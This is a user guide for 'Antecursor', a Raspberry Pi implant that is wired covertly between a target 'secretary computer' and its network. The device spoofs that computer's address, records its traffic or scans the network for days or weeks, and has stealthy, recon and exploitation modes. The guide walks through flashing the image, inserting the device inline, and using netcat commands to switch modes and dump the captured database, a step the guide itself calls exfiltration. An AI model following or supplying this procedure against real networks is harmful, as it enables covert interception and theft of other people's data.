.. This page intends to explain the product to the real user of the product.
   Also it comes with HowTos and tutorials to make the product usable to anyone.
   The userman page will also be used to create the User Guide manual in a booklet format.
   It is intended for the user who already owns the product.

==========
User Guide
==========

Introduction
============

Antecursor works autonomously on a raspberry pi, with several components and the software.

This guide will explain you step-by-step how to setup your own Antecursor.

Requirements
============

To make your own Antecursor, you will need:

- The latest Antecursor image. Simply download it from the Gitlab repository: https://gitlab.com/Antecursor/antecursor/pipelines?scope=tags&page=1.
- A Raspberry Pi board. The recommended model is the `Raspberry Pi 3 Model B+ <https://www.raspberrypi.org/products/raspberry-pi-3-model-b-plus/>`_, which was the most used for tests.
- A `micro SD card <https://www.amazon.fr/dp/B073K14CVB?th=1>`_ with enough capacity to store the data flow (depending on the chosen mode and the network environment).
- A battery to power the Raspberry, it may be either a `power bank <https://www.amazon.fr/dp/B075427JHL>`_ like this one for portable and autonomous intents, a `PoE hat <https://www.kubii.fr/cartes-extension-cameras-raspberry-pi/2280-raspberry-pi-poe-hat.html>`_ (optional if already integrated in your board, check the specs) if the target computer has a compatible wire plugged or just a `power supply <https://www.raspberrypi.org/products/raspberry-pi-universal-power-supply/>`_.
  Keep in mind it must meet your board specifications to avoid frying it. The Raspberry Pi 3 requires 5V/2.5A DC power input.
- An `USB to Ethernet adapter <https://www.amazon.fr/dp/B00PC0P2DI>`_.
- A USB or SD adapter to plug the micro SD card to your computer.


.. note::

   The indicated product examples are provided as pure guidance. You are free to choose any other similar equipment.
   We do not hold shares in any of the above mentioned companies and we do not intend to advertize for them.


Setup your live Antecursor device
=================================

If you meet the requirements, the next steps are:

1. Flashing the Antecursor image in the micro SD card.
2. Configuring your Antecursor device with your preferences.
3. Assembling everything together

Flashing image
--------------

Download the latest ``antecursor-build`` of the Antecursor system on Gitlab from here:
https://gitlab.com/Antecursor/antecursor/releases

When it has finished, open the ``.zip`` file, navigate to ``buildroot/output/images/`` folder and extract the ``sdcard.img`` image.

Plug the micro SD card on your computer with a USB or SD adapter.

At this point, there are different ways of writing the image on the SD card.
We will use the tool Etcher here, because it's available either on Windows, Linux and Mac OS, and very easy to use.
If you're looking for an other means, you can check out the Raspberry Pi tutorial, it's basically the same:
https://www.raspberrypi.org/documentation/installation/installing-images/README.md

- Get Etcher here: https://www.balena.io/etcher/
- Open Etcher and select the ``sdcard.img`` file.
- Select the SD card prveiously plugged.
- Click *Flash!* to begin the writing process.

Keep your micro SD card plugged for the configuration step.

Configuration
-------------

Open the file ``antecursor.cfg`` in the newly created partition.
From here you can modify the configuration options to fit your expectations.

You can change:

- ``ANTECURSOR_DB``: the name of the database filled by Antecursor
- ``ANTECURSOR_PCAP``: the name of the pcap file filled by Antecursor when the correct argument is passed in ``ANTECURSOR_ARGS``
- ``ANTECURSOR_NIC``: it's the interface connected to the secretary computer (eth0 is default, choose eth1 for the second interface)
- ``ANTECURSOR_ARGS``: additional arguments passed to the Antecursor main script, see below for a list of possible args

Additional arguments can be:

.. code-block:: none

 -o ${ANTECURSOR_PCAP}   generate a pcap file along with the database
 -m stealthy             specify the Antecursor mode (either stealthy, recon or exploitation)

See here for more information about the Antecursor script:
https://gitlab.com/Antecursor/antecursor/blob/dev/antecursor/Sniffer/README.md

Leave other options as is unless you know what you are doing.

Assemble and set it up
----------------------

Put the micro SD card in the Raspberry Pi you prepared.

If you have a PoE hat, put it on the Raspberry Pi.

In the working environment, identify the secretary computer you want to spoof and the network it is connected to.

With default configuration values (eth0 as target) you must plug cables like this:

1. Unplug the RJ45 cable from the secretary computer.
2. Plug this cable to the Antecursor case, so that it is connected to the network.
3. Plug a second RJ45 to the Antecursor to the first USB connector through the USB to Ethernet adapter.
4. Plug the second end to this RJ45 cable to the secrectary computer.
5. Power the Antecursor case with either a power battery, on sector or through PoE.

.. image:: ../static_files/illustrations/plugged_antecursor_case.jpg

Leave Antecursor there a few days or weeks depending on the data you intend to acquire.

Change config on the fly
========================

You might want to change the configuration during the run, it's possible to do so on a different device through the same network.

First, connect to the network on which the secretary and Antecursor operate.

Next, figure out the secretary computer IP address. Antecursor, while spoofing it, shares the same address.

Finally, you can command through a ``netcat`` command on port 8080. Antecursor recognizes the following commands:

.. code-block:: none

 PASSIVE         switch to stealthy mode
 ACTIVEQ         switch to quick recon mode
 ACTIVES         switch to slow recon mode (default recon mode)
 START_SCAN      start a new nmap scan (recon mode only)
 GET_DATABASE    dump the base64-encoded current database

Examples (assuming 192.168.0.1 is the secretary IP address):

- ``echo "ACTIVEQ" | nc 192.168.0.1 8080``
- ``echo "GET_DATABASE" | nc 192.168.0.1 8080 | base64 -d > out.db``


Get your data collection
========================

Remote data exfiltration is a work in progress: at current stage it is only possible from an other device through the same network as Antecursor and the secretary computer.
The process is described above (in *Change config on the fly* part).

When you come back to get the results, unplug the Antecursor case and revert your changes.

To fetch your data from the Antecursor case, plug it normally to your own network.
SSH will be enabled if no spoofing.

Get your data with ``scp``, through USB copy or with the netcat method described above.


Read your data collection
=========================

By default, the database you fetch isn't really user friendly.
That's why we made a Web GUI to quickly visualize and understand the data you collected.

Get it right here: https://gitlab.com/Antecursor/web-interface

You will have to download the project zip and extracting it in your work folder, or clone it using either:

.. code-block:: shell
   
   git clone git@gitlab.com:Antecursor/web-interface.git

or

.. code-block:: shell

   git clone https://gitlab.com/Antecursor/web-interface.git

When it's done, open ``html/home.html`` with your favorite browser.

With the Web GUI, you can upload the database you previously retrieved, and navigate in the menus to see what it contains.


If you wish to use the database for further development, see its structure `here <database-doc>`_.


Upgrade your Antecursor
========================

As the Antecursor project has been publicly released, it is likely to be improved continuously.
As mentioned earlier, the Antecursor building process is automated to provide a new flashable sdcard image for each commits.

To get the latest build of the Antecursor, either stable from the ``master`` branch or testing from the dev ``branch``, the Antecursor project team
has developed a set of upgrade scripts to help users keeping their firmware upgrade process "quick and easy". 

First, you'll have to pull the Antecursor project repo or cloning it using either:

.. code-block:: shell
   
   git clone git@gitlab.com:Antecursor/antecursor.git

or

.. code-block:: shell

   git clone https://gitlab.com/Antecursor/antecursor.git

The upgrade script is built on top of the GitLab API, in order to use it, you'll then need to get a personal access token with API access right:

1. Browse https://gitlab.com/profile/personal_access_tokens
2. Add a personal access token with API write
3. Backup this personal access token in a secure vault such as `KeePass <https://keepass.info/index.html>`_

The update script is located in the ``scripts`` folder. In order to use it, you'll have to plug the Antecursor's ``target`` network interface card into your own computer.

After booting up the Antecursor, you should now have obtained an IPv4 address which should be in the ``192.168.0.0/24`` network.

If all these steps have successfully been passed, you should now be able to use the update script as following:

.. code-block:: shell

   pushd antecursor/scripts/
   ACCESS_TOKEN=loremipsum ./upgrade.sh "${ACCESS_TOKEN}" 192.168.0.1 master slow -f

Usage: ``./upgrade.sh <access_token> <rpi_ip> <branch> <fast|slow> [-f|--force]``.

- The ``<branch>`` option can be either ``master`` or ``dev``.
- The ``<fast|slow>`` option corresponds to the upgrade mode:

  - ``fast`` mode will be used to attempt replacing the ``zImage`` file without formatting the sdcard (can break your system in case of significant update on the Antecursor system!)
  - ``slow`` mod will be used to flash the sdcard with the new system (the embedded system is run in-memory allowing us to format the remote sd-card seamlessly)

- The ``-f`` allows the script to upgrade the remote Antecursor system even if we've already downloaded the latest build

In case the Antecursor system has been broken (e.g., no network access, no HDMI output), please refer to the `Setup your live Antecursor device <#setup-your-live-antecursor-device>`_ documentation.